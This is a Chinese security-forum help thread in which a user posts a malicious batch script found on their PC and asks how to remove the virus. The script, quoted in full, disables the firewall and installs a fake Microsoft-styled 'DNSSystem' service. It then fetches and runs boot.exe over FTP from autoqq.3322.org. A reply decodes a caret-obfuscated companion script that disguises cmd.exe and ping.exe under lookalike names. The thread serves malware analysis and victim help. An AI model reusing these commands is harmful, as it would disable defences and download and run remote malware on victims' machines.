瑞星卡卡安全论坛

上午曾求助：http://bbs.ikaka.com/showtopic-8691413.aspx
其中一任务计划是运行：cmd /c cmd <c:\windows\system32\win.bat
win.bat的内容如下：
@ dir %SystemRoot%\system32 |find "SuCH0ST.exe"
@ if %ERRORLEVEL%==0 goto ok
@ if %ERRORLEVEL%==1 goto end
:ok
@ net stop sharedaccess
sc stop sharedaccess
^c^o^p^y ^c^m^d^.^e^x^e ^S^V^C^H^0^S^.^e^x^e /y
@ cmd /c sc create DNSSystem  binpath= "%systemroot%\system32\SVCH0S                                                                              /c  start SuCH0ST.exe " start= auto
@ cmd /c sc config DNSSystem displayname= "System DNS"
@ cmd /c sc config DNSSystem type= interact type= own
@ cmd /c sc description DNSSystem "(C) Microsoft Corporation 公司提供的(DNS)域名解析程序,如果该服务被停用，任何依赖它的服务将无法启动。"
@ sc start DNSSystem
%SystemRoot%\system32\SuCH0ST.exe
@ exit
:end
@ net stop sharedaccess
sc stop sharedaccess
del boot.exe /q
echo o autoqq.3322.org  > 1.RMVB&echo 1234 >> 1.RMVB&echo 1234 >> 1.RMVB&echo get boot.exe boot.exe >> 1.RMVB&echo bye >> 1.RMVB
ftp -s:1.RMVB
del 1.RMVB
ping 127.0.0.1 -n 3
cmd /c boot.exe
ping 127.0.0.1 -n 10
del boot.exe /q
exit


用户系统信息：Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)

关闭防火墙，建立病毒服务DNSSystem，病毒文件是%SystemRoot%\system32\SuCH0ST.exe
建立一个1.rmvb的文件，内容为：
o autoqq.3322.org 
1234
1234
get boot.exe boot.exe
bye

要如何处理？才能防这病毒
请分析一下：Attusb.dll是做什么用的

附件: Attusb.rar

这是个文本文件，去掉“^“这个符号号就是：
Tasklist/SVC |find /i "Systen.exe" && taskkill /f /im cmd.exe
copy C:\WINDOWS\system32\cmd.exe  C:\WINDOWS\system32\Systen.exe /y
copy C:\WINDOWS\system32\ping.exe  C:\WINDOWS\system32\EXPL0RER.EXE /y
Systen /c %SystemRoot%\system32\autousb.bat